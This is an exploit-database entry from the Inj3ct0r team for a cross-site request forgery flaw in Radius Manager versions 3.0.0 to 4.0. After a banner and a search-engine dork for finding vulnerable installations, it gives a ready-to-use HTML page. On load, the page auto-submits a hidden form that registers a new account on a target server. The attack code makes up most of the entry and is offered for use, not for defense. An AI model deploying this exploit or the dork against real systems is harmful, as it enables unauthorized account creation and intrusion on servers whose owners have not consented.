Radius Manager V3.0.0=>4.0 CSRF Vulnerability



EKU-ID: 1872 CVE: OSVDB-ID:
Author: Angel Injection Published: 2012-04-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Radius Manager V3.0.0=>4.0 CSRF Vulnerability
[-] Found by Angel Injection
[-] http://1337day.com http://r00tw0rm.com
[-] Greetz to all inj3ct0r team
[-] Security -::RISK: Normal
[-] Dork: intitle:"Radius Manager - New account registration"

[-]Exploit Code

<html>
<head>
<title>inj3ct0r Team</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "2917" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
   
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
       
        pausecomp(pauses[i]);
    }
}
   
</script>
<H2>1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team</H2>
<form method="POST" name="form0" action="http://Target:80/cp/reg.php?cont=store_user">
<input type="hidden" name="username" value="hello"/>
<input type="hidden" name="password1" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="firstname" value="FirstName"/>
<input type="hidden" name="lastname" value="LastName"/>
<input type="hidden" name="address" value="nothin"/>
<input type="hidden" name="city" value="lol"/>
<input type="hidden" name="zip" value="00964"/>
<input type="hidden" name="country" value="Conutry"/>
<input type="hidden" name="state" value="state"/>
<input type="hidden" name="phone" value="07801234567"/>
<input type="hidden" name="mobile" value="07801234568"/>
<input type="hidden" name="email" value="lol111@gmail.com"/>
<input type="hidden" name="srvid" value="41"/>
<input type="hidden" name="textarea" value="textarea"/>
<input type="hidden" name="acceptterms" value="1"/>
<input type="hidden" name="adduser" value="Create account"/>
</form>

</body>
</html>